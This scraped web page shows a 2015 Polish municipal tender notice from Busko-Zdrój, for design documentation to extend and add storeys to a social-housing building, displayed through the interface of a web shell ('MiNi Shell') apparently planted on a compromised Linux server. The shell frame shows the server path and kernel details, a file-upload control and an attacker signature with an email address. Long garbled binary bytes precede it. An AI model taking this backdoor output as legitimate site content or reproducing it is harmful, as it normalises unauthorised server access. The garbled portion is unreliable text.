JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150717/181186-N-2015.html

<p class="kh_header"><b>Busko-Zdrój: Opracowanie dokumentacji technicznej pn. *Rozbudowa i nadbudowa budynku wielorodzinnego* w ramach projektu *Zaspokajanie potrzeb społecznych poprzez zwiększenie zasobów mieszkań  socjalnych oraz zapewnienia opieki hospicyjnej*</b><br>
<b>Numer ogłoszenia: 181186 - 2015; data zamieszczenia: 17.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej pn. *Rozbudowa i nadbudowa budynku wielorodzinnego* w ramach projektu *Zaspokajanie potrzeb społecznych poprzez zwiększenie zasobów mieszkań  socjalnych oraz zapewnienia opieki hospicyjnej*.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest:
I.1 Usługa polegająca na opracowaniu dokumentacji technicznej, architektoniczno - budowlano - wykonawczej pn: 
 *Rozbudowa i nadbudowa budynku wielorodzinnego* 
w ramach projektu *Zaspokajanie potrzeb społecznych poprzez zwiększenie zasobów mieszkań  socjalnych oraz zapewnienia opieki hospicyjnej*. 

Obiekt: budynek mieszkalny wielorodzinny  trzykondygnacyjny podpiwniczony usytuowany jest w centrum  miasta Busko-Zdrój, przy  ul. Bohaterów Warszawy  - działka nr ewid. gruntu 26/16 obręb 12. Wykonany jest w konstrukcji tradycyjnej, pokryty stropodachem dwuspadowym. Powierzchnia zabudowy  wynosi około 402 m2. 

Dokumentacja projektowa obejmuje:
a)	projekt adaptacji, nadbudowy i rozbudowy istniejącego budynku mieszkalnego   wraz z inwentaryzacją i ekspertyzą techniczną zgodnie z obowiązującymi przepisami, 
b)	projekt zagospodarowania terenu wokół istniejącego budynku łącznie z miejscami postojowymi,
c)	projekty przebudowy ewentualnych kolizji z sieciami i urządzeniami nadziemnymi 
i podziemnymi uzbrojenia technicznego, wg warunków, o które należy wystąpić do dysponentów sieci,
d)	projekt budowy przyłącza kanalizacji deszczowej,
e)	projekt instalacji wewnętrznych (c.o., wod- kan. c.w.u., gaz, elektryczna, teletechniczna) z opomiarowaniem każdego lokalu oddzielnie dla wszystkich mediów,
f)	modernizację kotłowni wraz z projektem kolektorów słonecznych dla potrzeb przygotowania c.w.u.,
g)	wyposażenie w instalacje i sprzęt p.poż oraz opracowanie instrukcji bezpieczeństwa p.pożarowego,
h)	rozbudowę budynku w kierunku północnym (max. zabudowa działki nr ewid. 26/16) z przeznaczeniem na mieszkania socjalne, z uwzględnieniem zewnętrznego podwójnego szybu windowego,
i)	nadbudowę budynku o jedną lub dwie kondygnacje - w zależności od  ekspertyzy technicznej,
j)	remont stropodachu ewentualnie zmianę konstrukcji dachu i pokrycia (możliwa zmiana kształtu) -  w zależności od  ekspertyzy technicznej, z uwzględnieniem montażu kolektorów słonecznych,
k)	modernizację i dostosowanie istniejących pomieszczeń części nadziemnej na mieszkania socjalne dostosowane  do potrzeb mieszkańców (zgodnie z zatwierdzoną koncepcją),
l)	modernizację i dostosowanie piwnic i suteryn do działalności np. inkubatorów przedsiębiorczości oraz spółdzielni socjalnych,
m)	modernizację  ciągów komunikacyjnych wewnętrznych i zewnętrznych budynku,
n)	modernizację i doprojektowanie kominów wentylacyjnych i spalinowych,
o)	ocieplenie i wykonanie elewacji budynku zgodnie z obowiązującymi WT,
p)	 wymianę stolarki okiennej i drzwiowej,
q)	opracowanie przedmiarów robót. (przedmiary robót należy wykonać jako oddzielne opracowanie z podziałem na branże),
r)	aranżację wnętrz,
s)	opracowanie kosztorysów inwestorskich, zgodnie z obowiązującymi przepisami,
t)	opracowanie specyfikacji technicznych wykonania i odbioru robót,

I.2.  Opracowanie przedmiaru robót i kosztorysu inwestorskiego - dla  w/w zadania,
I.3. Opracowanie specyfikacji technicznej ogólnej wykonania i odbioru robót - dla w/w zadania.
I.4. Opracowanie  informacji dotyczącej bezpieczeństwa i ochrony zdrowia.

II. Zakres prac projektowych
      1. W zakres prac projektowych  wchodzi:
a.	Opracowanie projektu architektoniczno - budowlano-wykonawczego dla w.w. zadania. W ramach prac projektowych rozbudowy i nadbudowy budynku należy wykonać projekt wizualizacji zewnętrznej obiektu.
         Projekty budowlano-wykonawcze należy opracować w 6 egzemplarzach w wersji 
          papierowej + wersja elektroniczna dokumentacji do zamieszczenia na stronie  
          internetowej UMiG Busko-Zdrój, w formie cyfrowej na nośnikach elektronicznych 
          (rysunki w formacie DWG i w formacie PDF, teksy w doc. i w formacie PDF .  
b.	uzyskanie/opracowanie mapy do celów projektowych obejmującej zakres opracowania.
c.	opracowanie opinii technicznej lub ekspertyzy technicznej dotyczącej stanu konstrukcji budynu ze szczególnym uwzględnieniem możliwości jego nadbudowy. 
d.	uzyskanie wszystkich uzgodnień, opinii i pozwoleń wymaganych przepisami szczególnymi,  oraz uzgodnień branżowych.
           Obowiązek ten projektant realizuje poprzez opracowanie wniosków wraz z   
           niezbędnymi   załącznikami i dokumentami i złożenie ich do właściwych organów na 
           podstawie     udzielonego przez Burmistrza Pełnomocnictwa. W kosztach opracowania  
           projektu należy zatem uwzględnić  ewentualne koszty uzyskania uzgodnień, opinii i  
           pozwoleń.
e.	uzyskanie wszystkich decyzji, uzgodnień, opinii itp., niezbędnych dla zatwierdzenia   dokumentacji oraz możliwości:
	- zgłoszenia robót właściwemu organowi - roboty nie wymagające uzyskania pozwolenia na  budowę,
             -   wydania pozwolenia na budowę przez Starostwo Powiatowe w Busku-Zdroju - 
          roboty  które wymagają uzyskania takiego pozwolenia, 
f.	przygotowanie kompletnych materiałów niezbędnych do uzyskania przez projektanta odrębnych decyzji o Środowiskowych Uwarunkowaniach (jeśli wymagane), wraz z wyrysami i  wypisami z ewidencji gruntów oraz kartą informacyjną przedsięwzięcia.
g.	przygotowanie kompletnych wniosków (wraz z załącznikami) niezbędnych do uzyskania przez Zamawiającego wypisu z planu miejscowego.
h.	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
 z uwzględnieniem materiałów zaakceptowanych przez Zamawiającego (w 1 egzemplarzu + wersja elektroniczna - doc, PDF).
i.	opracowanie przedmiaru robót wraz z zestawieniem materiałów - (w 1 egzemplarzu  w wersji papierowej + wersja elektroniczna  na nośnikach elektronicznych - w formacie PDF, ATH, KST w programie NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz kalkulacyjny Excel).
Przedmiar robót należy wykonać zgodnie z obowiązującymi przepisami - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia  metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. zmianami). 
Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. 
j.	  opracowanie kosztorysu inwestorskiego w wersji uproszczonej  (w 1 egzemplarzu  w wersji papierowej + wersja elektroniczna  na nośnikach elektronicznych - w formacie PDF, ATH, KST w programie NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz kalkulacyjny Excel).
Kosztorys inwestorski zostanie wykonany zgodnie z obowiązującymi przepisami - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. zmianami). 
k.	pokrycie opłat za uzgodnienia branżowe oraz wszystkich innych kosztów związanych  z opracowaniem projektu,
l.	 nadzór projektowy na etapie realizacji robót.

     UWAGA! Wszystkie dokumenty, które będą występowały w oryginale należy umieścić w egzemplarzu nr 1.

2. Dokumentację techniczną należy opracować w oparciu o koncepcyjne rozwiązanie    
      zaproponowane przez Projektanta, po uzyskaniu akceptacji Zamawiającego 
3.  Dokumentacja projektowa winna być sporządzona przez osoby posiadające odpowiednie do zakresu prac uprawnienia oraz w przypadku konieczności -  sprawdzona przez osoby sprawdzające.
4. W cenie wykonania dokumentacji należy uwzględnić koszty związane z zakresem prac projektowych, w tym z:
a)  uzyskaniem wszystkich uzgodnień, opinii i pozwoleń niezbędnych do otrzymania:
          - pozwolenia na budowę 
b) uzyskanie / aktualizację mapy do celów projektowych, 
c) koszty sporządzenia aktualizacji kosztorysów inwestorskich. Aktualizacja kosztorysów może nastąpić w przypadku ogłoszenia przetargu w terminie przekraczającym 6 m-cy od daty opracowania kosztorysów.  
d) koszty nadzoru autorskiego w czasie realizacji inwestycji w ilości max. 5 wizyt na budowie na pisemne wezwanie Inwestora (nie wynikających z wad projektu).
5. Wykonawca projektu sprawować będzie nadzór autorski (bez dodatkowego 
    wynagrodzenia) w zakresie obejmującym w  szczególności:
    -  pisemnego udzielanie wyjaśnień i odpowiedzi na pytania oferentów na etapie ogłoszenia przetargu na wykonawstwo w terminie do 2 dni od ich przekazania przez Zamawiającego
    -  pisemnego wyjaśnienia Inwestorowi i Wykonawcy wątpliwości dotyczące projektu 
       budowlano- wykonawczego i zawartych w nim rozwiązań w terminie do 3 dni od ich 
       przekazania przez Zamawiającego
    -  ewentualne uzupełnienie szczegółów dokumentacji projektowej budowlano-
       wykonawczej,
    -   sprawdzanie zgodność realizacji robót (w tym dotyczących materiałów) z zakresem     
         dokumentacji projektowej
    -  konsultowania i uzgadniania z Zamawiającym i wykonawcą robót możliwości  
       wprowadzenia rozwiązań zamiennych w stosunku do materiałów przewidzianych w 
       dokumentacji projektowej 

 6. Wszelkie prace projektowe lub czynności nie opisane wyżej a wynikające z procedur     
      określonych w przepisach szczególnych, niezbędne do właściwego i kompleksowego 
      opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić  w 
       kosztach i terminach wykonania przedmiotu zamówienia.
7. Wszystkie dokumenty w formie elektronicznej należy przekazać:
-   w wersji źródłowej w programie, w którym zostały utworzone,
-    w programie umożliwiającym wydruki w formacie PDF
      -   przedmiar robót i kosztorys inwestorski - w formacie PDF, ATH, KST w programie 
           NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz 
           kalkulacyjny Excel)
       Projektant zobowiązuje się do aktualizacji kosztorysu (na pisemne wezwanie Zamawiającego) co 6 miesięcy do czasu wyłonienia Wykonawcy robót,
      - 	na nośnikach (płyta CD, CD-R). 

8. Projektant ponosi pełną odpowiedzialność za wady i błędy projektowe ujawnione w okresie procedur administracyjnych, jak również ujawnione w toku wdrażania do realizacji przedmiotu umowy.
		Projektant odpowiada również za wady i błędy w przedmiarze robót i kosztorysie inwestorskim, ujawnione podczas trwania procedury przetargowej na roboty budowlane, a w przypadku ich stwierdzenia, zobowiązuje się w wyznaczonym przez Zamawiającego terminie do wprowadzenia odpowiednich poprawek lub uzupełnień, bez dodatkowego wynagrodzenia.
	Projektant zobowiązuje się w wyznaczonym przez Zamawiającego terminie do udzielania wyczerpujących wyjaśnień na zadawane pytania przez Oferentów w trakcie trwania  procedury przetargowej na roboty budowlane, bez dodatkowego wynagrodzenia.
9. Do obowiązków Wykonawcy należy zaopatrzenie dzieła w pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi i normami oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć.

Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym w niniejszej specyfikacji istotnych warunków zamówienia ( SIWZ) oraz wzorze umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 4 000,00 zł (słownie: cztery tysiące złotych 00/100). Wykonawca, który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 głównych usług projektowych polegających na wykonaniu kompleksowego projektu budowlano-wykonawczego na budowę, przebudowę, modernizację lub remont obiektu kubaturowego mieszkalnego lub obiektu z przeznaczeniem na mieszkania, zlokalizowanego w układzie   urbanistycznym,  o łącznej powierzchni użytkowej  min. 500 m2 (branża budowlana i instalacyjna)

wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć:
1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1;
2. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano 
     wyboru Wykonawcy, może nastąpić w przypadku: 
    a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na   
      podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności,  których nie 
      można  było przewidzieć na etapie przygotowania inwestycji do realizacji,
    b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne 
       warunki Umowy  (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie 
     której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a) opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy  
    t.j. wydłużeniu ulegnie termin uzyskania wszelkich opinii, uzgodnień oraz decyzji administracyjnych. Termin ten zostaje wówczas  przedłużony o czas otrzymania w/w dokumentów;
b)  wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń itp. niezbędnych do wykonania przedmiotu zamówienia
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie dokonano 
    wyboru Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, których nie 
    można było  przewidzieć na etapie przygotowania inwestycji do projektowania.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie które 
    dokonano  wyboru Wykonawcy, może nastąpić w przypadkach
a) zmniejszenia zakresu rzeczowego Umowy,
b) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 36 d.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com